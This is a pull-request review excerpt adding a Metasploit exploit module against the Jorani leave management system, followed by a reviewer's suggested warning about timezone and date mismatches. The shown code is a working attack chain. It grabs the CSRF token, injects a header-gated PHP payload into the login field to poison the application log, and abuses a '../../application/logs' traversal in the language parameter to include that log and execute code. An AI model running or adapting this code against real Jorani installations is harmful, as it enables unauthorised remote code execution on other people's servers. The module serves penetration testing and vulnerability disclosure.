modules/exploits/multi/php/jorani_path_trav.rb

```diff
@@ -0,0 +1,170 @@
+    matches = res.body.scan(/&nbsp;v([0-9.]+)&nbsp;&copy;/i)
+    if matches.nil? || matches[0].nil?
+      print_error('Cannot recovered Jorani version...')
+      return nil
+    end
+    matches[0][0]
+  end
+
+  def service_running(res)
+    matches = res.body.scan(/Leave Management System/)
+    if matches.nil?
+      print_error("Jorani doesn't appear to be running on the target")
+      return false
+    end
+    true
+  end
+
+  def recover_csrf(res)
+    matches = res.body.scan(/<input type="hidden" name="csrf_test_jorani" value="(.*?)"/)
+    return matches[0][0] if matches.length == 1 && matches[0].length == 1
+
+    nil
+  end
+
+  def check
+    # For the check command
+    print_status('Checking Jorani version')
+    uri = normalize_uri(target_uri.path, 'index.php')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => "#{uri}/session/login"
+    )
+
+    if res.nil?
+      return Exploit::CheckCode::Safe('There was a problem accessing the login page')
+    end
+
+    return Exploit::CheckCode::Safe unless service_running(res)
+
+    print_good('Jorani seems to be running on the target!')
+
+    current_version = get_version(res)
+    return Exploit::CheckCode::Detected if current_version.nil?
+
+    print_good("Found version: #{current_version}")
+    current_version = Rex::Version.new(current_version)
+
+    return Exploit::CheckCode::Appears if current_version < Rex::Version.new('1.0.2')
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    # Main function
+    print_status('Trying to exploit LFI')
+
+    path_trav_payload = '../../application/logs'
+    header_name = Rex::Text.rand_text_alpha_upper(16)
+    poison_payload = "<?php if(isset($_SERVER['HTTP_#{header_name}'])){ #{payload.encoded} } ?>"
+    log_file_name = "log-#{Time.now.strftime('%Y-%m-%d')}"
+
+    uri = normalize_uri(target_uri.path, 'index.php')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'uri' => "#{uri}/session/login"
+    )
+
+    if res.nil?
+      print_error('There was a problem accessing the login page')
+      return
+    end
+
+    print_status('Recovering CSRF token')
+    csrf_tok = recover_csrf(res)
+    if csrf_tok.nil?
+      print_status('CSRF not found, doesn\'t mean its not vulnerable')
+    else
+      print_good("CSRF found: #{csrf_tok}")
+    end
+    print_status('Poisoning log with payload..')
+    print_status('Sending 1st payload')
+
+    send_request_cgi(
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'uri' => "#{uri}/session/login",
+      'data' => "csrf_test_jorani=#{csrf_tok}&"                  \
+                'last_page=session/login&'                       \
+                "language=#{path_trav_payload}&"                 \
+                "login=#{Rex::Text.uri_encode(poison_payload)}&" \
+                "CipheredValue=#{Rex::Text.rand_text_alpha(14)}"
+    )
+
+    print_status("Including poisoned log file #{log_file_name}.php")
```

Comment:
Ran into this issue last night while testing, not much you can do to prevent this from happening
```suggestion
    print_status("Including poisoned log file #{log_file_name}.php")
    vprint_warning("The date on the attacker and victim machine must be the same for the exploit to be successful due to the timestamp on the poisoned logfile. Be careful running this exploit around midnight across timezones.")
```